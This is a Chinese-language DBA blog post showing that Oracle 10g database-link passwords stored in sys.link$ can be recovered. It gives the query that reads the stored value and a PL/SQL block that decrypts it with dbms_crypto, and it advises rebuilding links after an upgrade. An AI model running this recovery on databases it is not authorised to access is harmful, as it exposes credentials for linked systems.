[20170607]10g dblink的密碼.txt
[20170607]10g dblink的密碼.txt
--//10g下建立的dblink密碼非常容易破解.只要能訪問表sys.link$,做一個簡單的測試來說明,實際上這個問題在11.2.0.1之前都是存在
--//的.
1.環境:
SYS@orcl> @ &r/ver1
PORT_STRING |VERSION |BANNER
------------------------------|--------------|----------------------------------------------------------------
x86_64/Linux 2.4.xx |10.2.0.4.0 |Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi
2.破解dblink密碼:
SYS@orcl> select PASSWORDX c40 from sys.link$ where name='XXX';
C40
----------------------------------------
0582XXXXXXXX042490XXXX1C8E6819B9
set serveroutput on
declare
db_link_password varchar2(100);
begin
db_link_password := '&1';
dbms_output.put_line ('Password: ' || utl_raw.cast_to_varchar2 ( dbms_crypto.decrypt ( substr (db_link_password, 19) , dbms_crypto.DES_CBC_PKCS5 , substr (db_link_password, 3, 16) ) ) );
end;
/
--//設定到安全因素,我修改了顯示輸出,我在生產系統做了驗證都是正確的.
--//要注意是如果系統從11.2.0.1升級,要注意重建dblink的密碼,規避這個問題.
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/267265/viewspace-2140379/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- [20170607]tail -F.txtAI
- 4、 oracle 10g中的密碼策略---密碼重用規則Oracle 10g密碼
- Oracle 不知使用者的密碼時,如何獲取dblink建立語句Oracle密碼
- dblink建立後訪問提示密碼錯誤問題解決密碼
- link$中明文存放了建立dblink的使用者名稱和密碼密碼
- 建立dblink的兩個指令碼。指令碼
- 10g升級到11g密碼問題密碼
- oracle 10g em 中如何修改dbsnmp使用者密碼Oracle 10g密碼
- 10g、11g口令檔案密碼大小寫敏感密碼
- [20160818]關閉資料庫會話的dblink.txt資料庫會話
- 10G密碼版本使用者無法登陸問題密碼
- oracle 10g em db control中如何修改sysman密碼Oracle 10g密碼
- Oracle 10g RAC 安裝及加入新節點文件密碼Oracle 10g密碼
- Oracle 10g 預設安裝帶來的使用者名稱/密碼Oracle 10g密碼
- 《密碼學系列》|| 密碼學中的流密碼是怎麼回事?密碼學
- 希爾密碼(hill密碼)密碼
- Oracle private dblink和pubic dblinkOracle
- 心底的密碼密碼
- federated MySQL的DBLinkMySql
- dblink的型別型別
- PbootCMS忘記密碼後的重置密碼流程boot密碼
- 密碼安全:密碼設定要求,密碼爆破辦法,密碼歸類使用,密碼處置方案密碼
- oracle 9i、10g、11g資料庫設定listener密碼的方法Oracle資料庫密碼
- 古典密碼的演化 (一)— 密碼學複習(二)密碼學
- 古典密碼的演化 (二)— 密碼學複習(三)密碼學
- 顯示密碼編輯框中的密碼 (轉)密碼
- mysql學習之-密碼管理(預設密碼,修改密碼,解決忘記密碼)MySql密碼
- PowerShell 指令碼中的密碼指令碼密碼
- [20180211]dblink查詢單個分割槽資料.txt
- 序列密碼與分組密碼密碼
- U盾密碼密碼重置方法密碼
- 隱藏密碼?顯示密碼?密碼
- 應用密碼學——古典密碼密碼學
- [20151007]關於11G密碼.txt密碼
- 被曝光的密碼密碼
- 【密碼學系列】|| 分組密碼的工作模式詳解密碼學模式
- 密碼學課程設計 - 混合密碼的實現密碼學
- ORACLE DBLINKOracle